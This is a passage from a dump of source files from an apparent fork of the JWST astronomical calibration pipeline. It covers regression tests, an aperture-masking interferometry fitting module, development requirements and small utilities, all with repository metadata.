DMSAttrConstraint\n\n\nLEVEL3_PRODUCT_NAME_REGEX = (\n r'jw'\n r'(?P<program>\\d{5})'\n r'-(?P<acid>[a-z]\\d{3,4})'\n r'_(?P<target>(?:t\\d{3})|(?:\\{source_id\\}))'\n r'(?:-(?P<epoch>epoch\\d+))?'\n r'_(?P<instrument>.+?)'\n r'_(?P<opt_elem>.+)'\n)\n\nLEVEL3_PRODUCT_NAME_NO_OPTELEM_REGEX = (\n r'jw'\n r'(?P<program>\\d{5})'\n r'-(?P<acid>[a-z]\\d{3,4})'\n r'_(?P<target>(?:t\\d{3})|(?:s\\d{5}))'\n r'(?:-(?P<epoch>epoch\\d+))?'\n r'_(?P<instrument>.+?)'\n)\n\n# Null values\nEMPTY = (None, '', 'NULL', 'Null', 'null', 'F', 'f', 'N', 'n')\n\n\npool_file = func_fixture(\n generate_params,\n scope='module',\n params=[\n t_path('data/mega_pool.csv'),\n ]\n)\n\n\nglobal_constraints = func_fixture(\n generate_params,\n scope='module',\n params=[\n DMSAttrConstraint(\n name='asn_candidate',\n value=['.+o002.+'],\n sources=['asn_candidate'],\n force_unique=True,\n is_acid=True,\n evaluate=True,\n ),\n ]\n)\n\n\[email protected]\ndef test_level35_names(pool_file):\n rules = registry_level3_only()\n pool = AssociationPool.read(pool_file)\n asns = generate(pool, rules)\n for asn in asns:\n product_name = asn['products'][0]['name']\n if asn['asn_rule'] == 'Asn_IFU':\n m = re.match(LEVEL3_PRODUCT_NAME_NO_OPTELEM_REGEX, product_name)\n else:\n m = re.match(LEVEL3_PRODUCT_NAME_REGEX, product_name)\n assert m is not None\n" }, { "alpha_fraction": 0.5353634357452393, "alphanum_fraction": 0.6060903668403625, "avg_line_length": 34.10344696044922, "blob_id": "fea75435592769085a6ccd4a1231f082d484eb61", "content_id": "bd2e4b303ebf7fda5c7712ad55fa3eac9bee1f37", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "permissive", "max_line_length": 86, "num_lines": 29, "path": "/jwst/tests_nightly/general/nircam/test_image2pipeline_2b.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_image2 import Image2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_image2pipeline2b(self):\n \"\"\"\n Regression test of calwebb_image2 pipeline performed on NIRCam data,\n using a multiple integration rate (rateints) file as input.\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw82500001003_02101_00001_NRCALONG_rateints.fits')\n output_file = 'jw82500001003_02101_00001_NRCALONG_calints.fits'\n\n Image2Pipeline.call(input_file,\n output_file=output_file)\n\n outputs = [(output_file,\n 'jw82500001003_02101_00001_NRCALONG_calints_ref.fits',\n ['primary','sci','err','dq','area']\n )\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5447866320610046, "alphanum_fraction": 0.5574570894241333, "avg_line_length": 31.799423217773438, "blob_id": "5b798a6c6d4972e2dafc7c3216e55020769f8fbd", "content_id": "bf42467da5273c275d405ef4b604269a41685a2d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22730, "license_type": "permissive", "max_line_length": 84, "num_lines": 693, "path": "/jwst/ami/nrm_model.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# A module for conveniently manipulating an 'NRM object' using the\n# Lacour-Greenbaum algorithm. First written by Alexandra Greenbaum in 2014.\n#\n# This module:\n# Defines mask geometry and detector-scale parameters\n# Simulates PSF (broadband or monochromatic)\n# Builds a fringe model - either by user definition, or automated to data\n# Fits model to data by least squares\n#\n# Algorithm documented in: Greenbaum, A. Z., Pueyo, L. P.,\n# Sivaramakrishnan, A., and Lacour, S. ; Astrophysical Journal (submitted) 2014.\n# Developed with NASA APRA (AS, AZG), NSF GRFP (AZG), NASA Sagan (LP), and\n# French taxpayer (SL) support.\n#\n# Heritage mathematica nb from Alex Greenbaum & Laurent Pueyo\n# Heritage python by Alex Greenbaum & Anand Sivaramakrishnan Jan 2013\n# - updated May 2013 to include hexagonal envelope\n# - updated (hard refactored) Oct-Nov 2014 Anand S.\n\nimport logging\nimport numpy as np\n\nfrom . import leastsqnrm as leastsqnrm\nfrom . import analyticnrm2\nfrom . import utils\nfrom . import hexee\nfrom . import nrm_consts\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\nclass NrmModel:\n\n def __init__(self, mask=None, holeshape=\"circ\", pixscale=hexee.mas2rad(65),\n rotate=False, over=1, flip=False, pixweight=None, scallist=None,\n rotlist_deg=None, phi=\"perfect\"):\n \"\"\"\n Short Summary\n -------------\n Set attributes of NrmModel class.\n\n Parameters\n ----------\n mask: string\n keyword for built-in values\n\n holeshape: string\n shape of apertures\n\n pixscale: float\n initial estimate of pixel scale in radians\n\n rotate: float\n initial estimate of rotation in radians\n\n over: integer\n oversampling factor\n\n flip: Boolean, default=False\n change sign of 2nd coordinate of holes\n\n pixweight: 2D float array, default is None\n weighting array\n\n scallist: float 1D array\n candidate relative pixel scales\n\n rotlist_deg: float 1D array\n Search window for rotation fine-tuning, in degrees\n\n phi: float 1D array\n distance of fringe from hole center in units of waves\n \"\"\"\n self.holeshape = holeshape\n self.pixel = pixscale\n self.over = over\n self.maskname = mask\n self.pixweight = pixweight\n\n if mask.lower() == 'jwst':\n self.ctrs = np.array( [[ 0.00000000, -2.640000],\n [-2.2863100, 0.0000000],\n [ 2.2863100 , -1.3200001],\n [-2.2863100 , 1.3200001],\n [-1.1431500 , 1.9800000],\n [ 2.2863100 , 1.3200001],\n [ 1.1431500 , 1.9800000]] )\n self.d = 0.80\n self.D = 6.5\n else:\n try:\n log.debug('mask.ctrs:%s', mask.ctrs)\n except AttributeError:\n raise AttributeError(\"mask must be either 'jwst' \\\n or NRM_mask_geometry object\")\n\n log.debug('NrmModel: ctrs flipped in init for CV1, CV2')\n\n if rotate:\n log.info('Providing additional rotation %s degrees',\n rotate * 180. / np.pi)\n\n # Rotates vector counterclockwise in coordinates\n self.rotation = rotate\n self.ctrs = leastsqnrm.rotatevectors(self.ctrs, rotate)\n\n # From now on this 'rotated' set of centers is used as the\n # nominal, and rotation searches (using rotlist_rad) are\n # performed with this rotated version of the 'as designed'\n # mask.. In CV1 and CV2 the mask is \"flipped\" by\n # multiplying ctrs[:1] by -1... which places segment B4\n # (the 6 o clock segment) at the top instead of at bottom\n # in traditional XY plots\n\n self.N = len(self.ctrs)\n\n if scallist is None:\n self.scallist = np.array([0.995, 0.998, 1.0, 1.002, 1.005, ])\n else:\n self.scallist = scallist\n\n if rotlist_deg is None:\n self.rotlist_rad = np.array([-1.0,-0.5,0.0,0.5,1.0]) * np.pi / 180.0\n else:\n self.rotlist_rad = rotlist_deg * np.pi / 180.0\n\n if phi == \"perfect\":\n self.phi = np.zeros(len(self.ctrs))\n elif phi == 'nb':\n self.phi = nrm_consts.phi_nb\n else:\n self.phi = phi\n\n\n def simulate(self, fov=None, bandpass=None, over=None, pixweight=None,\n pixel=None, rotate=False, centering=\"PIXELCENTERED\"):\n \"\"\"\n Short Summary\n -------------\n Simulate a psf using parameters input from the call and already stored in\n the object. It also generates a simulation fits header storing all of the\n parameters used to generate that psf. If the input bandpass is one\n number it will calculate a monochromatic PSF.\n\n Parameters\n ----------\n fov: integer, default=None\n number of detector pixels on a side\n\n bandpass: 2D float array, default=None\n array of the form: [(weight1, wavl1), (weight2, wavl2), ...]\n\n over: integer\n Oversampling factor\n\n pixweight: 2D float array, default=None\n weighting array\n\n pixel: float, default=None\n pixel scale\n\n rotate: float, default=False,\n rotation angle in radians\n\n centering: string, default=None\n type of centerings\n\n Returns\n -------\n Object's 'psf': float 2D array\n simulated psf\n \"\"\"\n # First set up conditions for choosing various parameters\n if fov is None:\n if not hasattr(self, 'fov'):\n log.critical('Field is not specified')\n return None\n else:\n self.fov_sim = self.fov\n log.debug('Using predefined FOV size: %s', self.fov)\n else:\n self.fov_sim = fov\n\n if hasattr(centering, '__iter__'):\n if centering == 'PIXELCENTERED':\n centering=(0.5, 0.5)\n elif centering == 'PIXELCORNER':\n centering=(0.0, 0.0)\n\n self.bandpass = bandpass\n\n if not hasattr(self, 'over'):\n if over is None:\n self.over = 1\n else:\n self.over = over\n\n if self.over is None:\n self.over = over\n\n if pixweight is not None:\n self.over = self.pixweight.shape[0]\n\n self.phi = np.zeros(len(self.ctrs))\n\n if rotate: # this is a 'temporary' rotation of self.ctrs\n # without altering self.ctrs\n self.rotate = rotate\n self.rotctrs = leastsqnrm.rotatevectors(self.ctrs, self.rotate)\n else:\n self.rotctrs = self.ctrs\n\n if pixel is None:\n self.pixel_sim = self.pixel\n else:\n self.pixel_sim = pixel\n\n # The polychromatic case:\n if hasattr(self.bandpass, '__iter__'):\n log.debug(\"------Simulating Polychromatic------\")\n self.psf_over = np.zeros((self.over*self.fov_sim,\n self.over*self.fov_sim))\n for w,l in self.bandpass: # w: weight, l: lambda (wavelength)\n self.psf_over += w*analyticnrm2.PSF(self.pixel_sim,\n self.fov_sim, self.over, self.rotctrs, self.d, l,\n self.phi, centering = centering, shape=self.holeshape)\n\n log.debug(\"BINNING UP TO PIXEL SCALE\")\n\n # The monochromatic case if bandpass input is a single wavelength\n else:\n self.lam = bandpass\n\n log.debug(\"Calculating Oversampled PSF\")\n self.psf_over = analyticnrm2.PSF(self.pixel_sim, self.fov_sim,\n self.over, self.rotctrs, self.d, self.lam,\n self.phi, centering=centering,\n shape=self.holeshape)\n\n self.psf = utils.rebin(self.psf_over, (self.over, self.over))\n\n return self.psf\n\n\n def make_model(self, fov=None, bandpass=None, over=False,\n centering='PIXELCENTERED', pixweight=None, pixscale=None,\n rotate=False, flip=False):\n \"\"\"\n Short Summary\n -------------\n Generates the fringe model with the attributes of the object\n using a bandpass as a list of tuples.\n\n Parameters\n ----------\n fov: integer, default=None\n number of detector pixels on a side\n\n bandpass: 2D float array, default=None\n array of the form: [(weight1, wavl1), (weight2, wavl2), ...]\n\n over: integer\n oversampling factor\n\n centering: string, default=None\n type of centering\n\n pixweight: 2D float array, default=None\n weighting array\n\n pixscale: float, default=None\n pixel scale\n\n rotate: float, default=False\n rotation angle in radians\n\n flip: Boolean, default=False\n change sign of 2nd coordinate of holes\n\n Returns\n -------\n Object's 'model': fringe model\n Generated fringe model\n \"\"\"\n if fov:\n self.fov = fov\n\n if over is False:\n self.over = 1\n else:\n self.over = over\n\n if pixweight is not None:\n self.over = self.pixweight.shape[0]\n\n if hasattr(self, 'pixscale_measured'):\n if self.pixscale_measured is not None:\n self.modelpix = self.pixscale_measured\n\n if pixscale is None:\n self.modelpix = self.pixel\n else:\n self.modelpix = pixscale\n\n if rotate:\n if flip is True:\n self.modelctrs = leastsqnrm.flip(\n leastsqnrm.rotatevectors(self.ctrs, self.rot_measured))\n else:\n self.modelctrs = leastsqnrm.rotatevectors(\n self.ctrs, self.rot_measured)\n else:\n self.modelctrs = self.ctrs\n\n if not hasattr(bandpass, '__iter__'):\n self.lam = bandpass\n self.model = np.ones((self.fov, self.fov, self.N*(self.N-1)+2))\n self.model_beam, self.fringes = leastsqnrm.model_array(\n self.modelctrs, self.lam, self.over, self.modelpix,\n self.fov, self.d, shape=self.holeshape, centering=centering)\n\n log.debug(\"centering: {0}\".format(centering))\n log.debug(\"what primary beam has the model created?\"+\n \" {0}\".format(self.model_beam))\n\n # this routine multiplies the envelope by each fringe \"image\"\n self.model_over = leastsqnrm.multiplyenv(self.model_beam, self.fringes)\n\n self.model = np.zeros((self.fov,self.fov, self.model_over.shape[2]))\n\n # loop over slices \"sl\" in the model\n for sl in range(self.model_over.shape[2]):\n self.model[:,:,sl] = utils.rebin( self.model_over[:,:,sl],\n (self.over, self.over))\n return self.model\n\n else:\n self.bandpass = bandpass\n\n # The model shape is (fov) x (fov) x (# solution coefficients)\n # the coefficient refers to the terms in the analytic equation\n # There are N(N-1) independent pistons, double-counted by cosine\n # and sine, one constant term and a DC offset.\n self.model = np.ones((self.fov, self.fov, self.N*(self.N-1)+2))\n self.model_beam = np.zeros((self.over*self.fov, self.over*self.fov))\n self.fringes = np.zeros((\n self.N*(self.N-1)+1, self.over*self.fov, self.over*self.fov))\n\n for w,l in self.bandpass: # w: weight, l: lambda (wavelength)\n # model_array returns the envelope and fringe model\n pb, ff = leastsqnrm.model_array(\n self.modelctrs, l, self.over, self.modelpix, self.fov,\n self.d, shape=self.holeshape, centering=centering)\n\n log.debug(\"centering: {0}\".format(centering))\n log.debug(\"what primary beam has the model created? {0}\".format(pb))\n\n self.model_beam += pb\n self.fringes += ff\n\n # this routine multiplies the envelope by each fringe \"image\"\n self.model_over = leastsqnrm.multiplyenv(pb, ff)\n\n model_binned = np.zeros((\n self.fov,self.fov, self.model_over.shape[2]))\n\n # loop over slices \"sl\" in the model\n for sl in range(self.model_over.shape[2]):\n model_binned[:,:,sl] = utils.rebin(\n self.model_over[:,:,sl], (self.over, self.over))\n\n self.model += w*model_binned\n\n return self.model\n\n\n def fit_image(self, image, reference=None, pixguess=None, rotguess=0,\n modelin=None, weighted=False, centering='PIXELCENTERED',\n savepsfs=True):\n \"\"\"\n Short Summary\n -------------\n Run a least-squares fit on an input image; find the appropriate\n wavelength scale and rotation. If a model is not specified then this\n method will find the appropriate wavelength scale, rotation (and\n hopefully centering as well -- This is not written into the object yet,\n but should be soon).\n\n Parameters\n ----------\n image: 2D float array\n input image\n\n reference: 2D float array\n input reference image\n\n pixguess: float\n estimate of pixel scale of the data\n\n rotguess: float\n estimate of rotation\n\n modelin: 2D array\n optional model image\n\n weighted: boolean\n use weighted operations in the least squares routine\n\n centering: string, default=None\n type of centering\n\n savepsfs: boolean\n save the psfs for writing to file (currently unused)\n\n Returns\n -------\n None\n \"\"\"\n self.model_in = modelin\n self.weighted = weighted\n self.saveval = savepsfs\n\n if modelin is None: # No model provided\n # Perform a set of automatic routines\n # A Cleaned up version of your image to enable Fourier fitting for\n # centering crosscorrelation with FindCentering() and\n # magnification and rotation via improve_scaling().\n\n if reference is None:\n self.reference = image\n if np.isnan(image.any()):\n raise ValueError(\"Must have non-NaN image to \"+\n \"crosscorrelate for scale. Reference \"+\n \"image should also be centered. Get to it.\")\n else:\n self.reference = reference\n\n if pixguess is None or rotguess is None:\n raise ValueError(\"MUST SPECIFY GUESSES FOR PIX & ROT\")\n\n self.improve_scaling(self.reference, scaleguess=self.pixel,\n rotstart=rotguess, centering=centering)\n\n self.pixscale_measured = self.pixscale_factor*self.pixel\n\n self.fov = image.shape[0]\n self.fittingmodel = self.make_model(self.fov, bandpass=self.bandpass,\n over=self.over, rotate=True, centering=centering,\n pixscale=self.pixscale_measured)\n else:\n self.fittingmodel = modelin\n\n if weighted is not False:\n self.soln, self.residual = leastsqnrm.weighted_operations(image,\n self.fittingmodel, weights=self.weighted)\n else:\n self.soln, self.residual, self.cond = leastsqnrm.matrix_operations(\n image, self.fittingmodel)\n\n self.rawDC = self.soln[-1]\n self.flux = self.soln[0]\n self.soln = self.soln/self.soln[0]\n self.deltapsin = leastsqnrm.sin2deltapistons(self.soln)\n self.deltapcos = leastsqnrm.cos2deltapistons(self.soln)\n\n self.fringeamp, self.fringephase = leastsqnrm.tan2visibilities(self.soln)\n self.piston = utils.fringes2pistons(self.fringephase, len(self.ctrs))\n self.closurephase = leastsqnrm.closurephase(self.fringephase, N=self.N)\n self.redundant_cps = leastsqnrm.redundant_cps(self.fringephase, N=self.N)\n self.redundant_cas = leastsqnrm.return_CAs(self.fringeamp, N=self.N)\n\n\n def create_modelpsf(self):\n \"\"\"\n Short Summary\n -------------\n Make an image from the object's model and fit solutions, by setting the\n NrmModel object's modelpsf attribute\n\n Parameters\n ----------\n None\n\n Returns\n -------\n None\n \"\"\"\n try:\n self.modelpsf = np.zeros((self.fov, self.fov))\n except AttributeError:\n self.modelpsf = np.zeros((self.fov_sim, self.fov_sim))\n\n for ind, coeff in enumerate(self.soln):\n self.modelpsf += self.flux * coeff * self.fittingmodel[:, :, ind]\n\n return None\n\n\n def improve_scaling(self, img, scaleguess=None, rotstart=0.0,\n centering='PIXELCENTERED'):\n \"\"\"\n Short Summary\n -------------\n Determine the scale and rotation that best fits the data. Correlations\n are calculated in the image plane, in anticipation of data with many\n bad pixels.\n\n Parameters\n ----------\n img: 2D float array\n input image\n\n scaleguess: float\n initial estimate of pixel scale in radians\n\n rotstart: float\n estimate of rotation\n\n centering: string, default='PIXELCENTERED'\n type of centering\n\n Returns\n -------\n self.pixscale_factor: float\n improved estimate of pixel scale in radians\n\n self.rot_measured: float\n value of mag at the extreme value of rotation from quadratic fit\n\n self.gof: float\n goodness of fit\n \"\"\"\n if not hasattr(self, 'bandpass'):\n raise ValueError(\"This object has no specified bandpass/wavelength\")\n\n reffov = img.shape[0]\n scal_corrlist = np.zeros((len(self.scallist), reffov, reffov))\n pixscl_corrlist = scal_corrlist.copy()\n scal_corr = np.zeros(len(self.scallist))\n self.pixscl_corr = scal_corr.copy()\n\n # User can specify a reference set of phases (m) at an earlier point so\n # that all PSFs are simulated with those phase pistons (e.g. measured\n # from data at an earlier iteration\n if not hasattr(self, 'refphi'):\n self.refphi = np.zeros(len(self.ctrs))\n else:\n pass\n\n self.pixscales = np.zeros(len(self.scallist))\n for q, scal in enumerate(self.scallist):\n self.test_pixscale = self.pixel*scal\n self.pixscales[q] = self.test_pixscale\n psf = self.simulate(bandpass=self.bandpass, fov=reffov,\n pixel = self.test_pixscale, centering=centering)\n pixscl_corrlist[q,:,:] = run_data_correlate(img,psf)\n self.pixscl_corr[q] = np.max(pixscl_corrlist[q])\n if True in np.isnan(self.pixscl_corr):\n raise ValueError(\"Correlation produced NaNs, check your work!\")\n\n self.pixscale_optimal, scal_maxy = utils.findmax(\n mag=self.pixscales, vals=self.pixscl_corr)\n self.pixscale_factor = self.pixscale_optimal / self.pixel\n\n radlist = self.rotlist_rad\n corrlist = np.zeros((len(radlist), reffov, reffov))\n self.corrs = np.zeros(len(radlist))\n\n self.rots = radlist\n for q,rad in enumerate(radlist):\n psf = self.simulate(bandpass=self.bandpass, fov=reffov,\n pixel=self.pixscale_optimal, rotate=rad, centering=centering)\n\n corrlist[q,:,:] = run_data_correlate(psf, img)\n self.corrs[q] = np.max(corrlist[q])\n\n self.rot_measured, maxy = utils.findmax(mag=self.rots, vals = self.corrs)\n self.refpsf = self.simulate(bandpass=self.bandpass,\n pixel=self.pixscale_factor*self.pixel, fov=reffov,\n rotate=self.rot_measured, centering=centering)\n\n try:\n self.gof = goodness_of_fit(img,self.refpsf)\n except Exception:\n self.gof = False\n\n return self.pixscale_factor, self.rot_measured, self.gof\n\n\ndef makedisk(N, R, ctr=(0,0)):\n \"\"\"\n Short Summary\n -------------\n Calculate a 'disk', an array whose values =1 in a circular region near\n the center of the array, and =0 elsewhere. (Anand's emailed version)\n\n Parameters\n ----------\n N: integer\n size of 1 dimension of the array to be returned\n\n R: integer\n radius of disk\n\n ctr: (integer, integer)\n center of disk\n\n array: 'ODD' or 'EVEN'\n parity of size of edge\n\n Returns\n -------\n array: 2D integer array\n \"\"\"\n if N%2 == 1: # odd\n M = (N-1)/2\n xx = np.linspace(-M-ctr[0],M-ctr[0],N)\n yy = np.linspace(-M-ctr[1],M-ctr[1],N)\n if N%2 == 0: # even\n M = N/2\n xx = np.linspace(-M-ctr[0],M-ctr[0]-1,N)\n yy = np.linspace(-M-ctr[1],M-ctr[1]-1,N)\n\n (x,y) = np.meshgrid(xx, yy.T)\n r = np.sqrt((x**2)+(y**2))\n array = np.zeros((N,N))\n array[r<R] = 1\n\n return array\n\n\ndef goodness_of_fit(data, bestfit, diskR=8):\n \"\"\"\n Short Summary\n -------------\n Calculate goodness of fit between the data and the fit.\n\n Parameters\n ----------\n data: 2D float array\n input image\n\n bestfit: 2D float array\n fit to input image\n\n diskR: integer\n radius of disk\n\n Returns\n -------\n gof: float\n goodness of fit\n \"\"\"\n mask = np.ones(data.shape) + makedisk(data.shape[0], 2) -\\\n makedisk(data.shape[0], diskR)\n\n difference = np.ma.masked_invalid(mask * (bestfit - data))\n\n masked_data = np.ma.masked_invalid(mask * data)\n\n gof = abs(difference).sum() / abs(masked_data).sum()\n\n return gof\n\n\ndef run_data_correlate(data, model):\n \"\"\"\n Short Summary\n -------------\n Calculate correlation between data and model\n\n Parameters\n ----------\n data: 2D float array\n reference image\n\n model: 2D float array\n simulated psf\n\n Returns\n -------\n cor: 2D float array\n correlation between data and model\n\n \"\"\"\n sci = data\n log.debug('shape sci: %s', np.shape(sci))\n\n cor = utils.rcrosscorrelate(sci, model)\n\n return cor\n" }, { "alpha_fraction": 0.8136646151542664, "alphanum_fraction": 0.8136646151542664, "avg_line_length": 52.66666793823242, "blob_id": "610a0ccdf24295f5e4fb4b6c06417ee776ddfc0c", "content_id": "780e2c5bf5d71c011ba7e8d48d3c0bad03403dc4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 322, "license_type": "permissive", "max_line_length": 59, "num_lines": 6, "path": "/requirements-dev.txt", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "git+https://github.com/spacetelescope/asdf#egg=asdf\ngit+https://github.com/astropy/astropy#egg=astropy\ngit+https://github.com/spacetelescope/crds#egg=crds\ngit+https://github.com/spacetelescope/gwcs#egg=gwcs\ngit+https://github.com/astropy/photutils#egg=photutils\ngit+https://github.com/spacetelescope/tweakwcs#egg=tweakwcs\n" }, { "alpha_fraction": 0.7849462628364563, "alphanum_fraction": 0.7849462628364563, "avg_line_length": 30, "blob_id": "9e5e528c9375e405387b75298a6cf59c387e1b16", "content_id": "5939c8b71bd9eb3ff55a16a66f9eac5a3e1fb8b4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "permissive", "max_line_length": 56, "num_lines": 3, "path": "/jwst/master_background/__init__.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .master_background_step import MasterBackgroundStep\n\n__all__ = ['MasterBackgroundStep']\n" }, { "alpha_fraction": 0.6214713454246521, "alphanum_fraction": 0.6223267912864685, "avg_line_length": 25.56818199157715, "blob_id": "9b12b5811bf95cef3e7b0f40ebca36794073ae8a", "content_id": "794593ec41766a7cd5e9ac03d9468d81fc29ce16", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2338, "license_type": "permissive", "max_line_length": 80, "num_lines": 88, "path": "/jwst/lib/basic_utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"General utility objects\"\"\"\nimport re\n\n\ndef multiple_replace(string, rep_dict):\n \"\"\"Single-pass replacement of multiple substrings\n\n Similar to `str.replace`, except that a dictionary of replacements\n can be specified.\n\n The replacements are done in a single-pass. This means that a previous\n replacement will not be replaced by a subsequent match.\n\n Parameters\n ----------\n string: str\n The source string to have replacements done on it.\n\n rep_dict: dict\n The replacements were key is the input substring and\n value is the replacement\n\n Returns\n -------\n replaced: str\n New string with the replacements done\n\n Examples\n --------\n Basic example that also demonstrates the single-pass nature.\n If the replacements where chained, the result would have been\n 'lamb lamb'\n\n >>> multiple_replace('button mutton', {'but': 'mut', 'mutton': 'lamb'})\n 'mutton lamb'\n\n \"\"\"\n pattern = re.compile(\n \"|\".join([re.escape(k) for k in sorted(rep_dict,key=len,reverse=True)]),\n flags=re.DOTALL\n )\n return pattern.sub(lambda x: rep_dict[x.group(0)], string)\n\n\nclass LoggingContext:\n \"\"\"Logging context manager\n\n Keep logging configuration within a context\n\n Based on the Python 3 Logging Cookbook example\n\n Parameters\n ==========\n logger: logging.Logger\n The logger to modify.\n\n level: int\n The log level to set.\n\n handler: logging.Handler\n The handler to use.\n\n close: bool\n Close the handler when done.\n \"\"\"\n def __init__(self, logger, level=None, handler=None, close=True):\n self.logger = logger\n self.level = level\n self.handler = handler\n self.close = close\n\n self.old_level = None\n\n def __enter__(self):\n if self.level is not None:\n self.old_level = self.logger.level\n self.logger.setLevel(self.level)\n if self.handler:\n self.logger.addHandler(self.handler)\n\n def __exit__(self, et, ev, tb):\n if self.level is not None:\n self.logger.setLevel(self.old_level)\n if self.handler:\n self.logger.removeHandler(self.handler)\n if self.handler and self.close:\n self.handler.close()\n # implicit return of None => don't swallow exceptions\n" }, { "alpha_fraction": 0.5377128720283508, "alphanum_fraction": 0.6366585493087769, "avg_line_length": 36.3636360168457, "blob_id": "28981cc776b562979f4af6805b8ecaadf1cab787", "content_id": "acbbc6f1e5e5d750f32946526ed4d4d19c093b88", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1233, "license_type": "permissive", "max_line_length": 90, "num_lines": 33, "path": "/jwst/tests_nightly/general/niriss/test_nis_wfss_spec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.calwebb_spec2 import Spec2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_spec2pipeline', 'truth']\n test_dir = 'test_spec2pipeline'\n\n def test_nis_wfss_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRISS WFSS data.\n \"\"\"\n # Collect data\n asn_file = self.get_data(self.test_dir,\n 'jw87600-a3001_20171109T145456_spec2_001_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n # Run the step\n collect_pipeline_cfgs('cfgs')\n Spec2Pipeline.call(asn_file, config_file='cfgs/calwebb_spec2.cfg', save_bsub=True)\n\n # Test results.\n outputs = [('jw87600017001_02101_00002_nis_cal.fits',\n 'jw87600017001_02101_00002_nis_cal_ref.fits'),\n ('jw87600017001_02101_00002_nis_x1d.fits',\n 'jw87600017001_02101_00002_nis_x1d_ref.fits')]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5849056839942932, "alphanum_fraction": 0.619662344455719, "avg_line_length": 38.490196228027344, "blob_id": "8060c9252c7766aa95ceb7fc60ef0b30d1da1069", "content_id": "5bdbb8efe8fb8933eba988b3f9644a8d14116590", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2014, "license_type": "permissive", "max_line_length": 92, "num_lines": 51, "path": "/jwst/regtest/test_miri_image_detector1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\nfrom astropy.io.fits.diff import FITSDiff\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\[email protected](scope=\"module\")\ndef run_pipeline(jail, rtdata_module):\n \"\"\"Run calwebb_detector1 pipeline on MIRI imaging data.\"\"\"\n rtdata = rtdata_module\n rtdata.get_data(\"miri/image/jw00001001001_01101_00001_MIRIMAGE_uncal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/calwebb_detector1.cfg\", rtdata.input,\n \"--steps.dq_init.save_results=True\",\n \"--steps.lastframe.save_results=True\",\n \"--steps.firstframe.save_results=True\",\n \"--steps.saturation.save_results=True\",\n \"--steps.rscd.save_results=True\",\n \"--steps.linearity.save_results=True\",\n \"--steps.dark_current.save_results=True\",\n \"--steps.refpix.save_results=True\",\n \"--steps.jump.rejection_threshold=25\",\n \"--steps.jump.save_results=True\",\n \"--steps.ramp_fit.save_opt=True\",\n \"--steps.ramp_fit.save_results=True\"]\n\n Step.from_cmdline(args)\n return rtdata\n\n\[email protected]\[email protected](\"output\", ['rate', 'rateints', 'linearity', 'rscd',\n 'dq_init', 'firstframe', 'lastframe',\n 'saturation', 'dark_current', 'refpix',\n 'jump', 'fitopt'])\ndef test_miri_image_detector1(run_pipeline, request, fitsdiff_default_kwargs, output):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on MIRI data.\n \"\"\"\n\n rtdata = run_pipeline\n rtdata.output = \"jw00001001001_01101_00001_MIRIMAGE_\" + output + \".fits\"\n\n rtdata.get_truth(os.path.join(\"truth/test_miri_image_detector1\",\n \"jw00001001001_01101_00001_MIRIMAGE_\" + output + \".fits\"))\n\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5993969440460205, "alphanum_fraction": 0.6011199951171875, "avg_line_length": 33.649253845214844, "blob_id": "ccdcd9014299b5c4253a89b37315ba1e3ce75eb6", "content_id": "5748e26df39a3db7537941d2a5e8d55c5ef46b15", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4643, "license_type": "permissive", "max_line_length": 87, "num_lines": 134, "path": "/jwst/flatfield/flat_field_step.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from ..stpipe import Step\nfrom .. import datamodels\nfrom . import flat_field\n\n# For the following types of data, it is OK -- and in some cases\n# required -- for the extract_2d step to have been run. For all\n# other types of data, the extract_2d step must not have been run.\nEXTRACT_2D_IS_OK = [\n \"NRS_BRIGHTOBJ\",\n \"NRS_FIXEDSLIT\",\n \"NRS_LAMP\",\n \"NRS_MSASPEC\",\n ]\n\n# NIRSpec imaging types (see exp_type2transform in assign_wcs/nirspec.py)\nNRS_IMAGING_MODES = 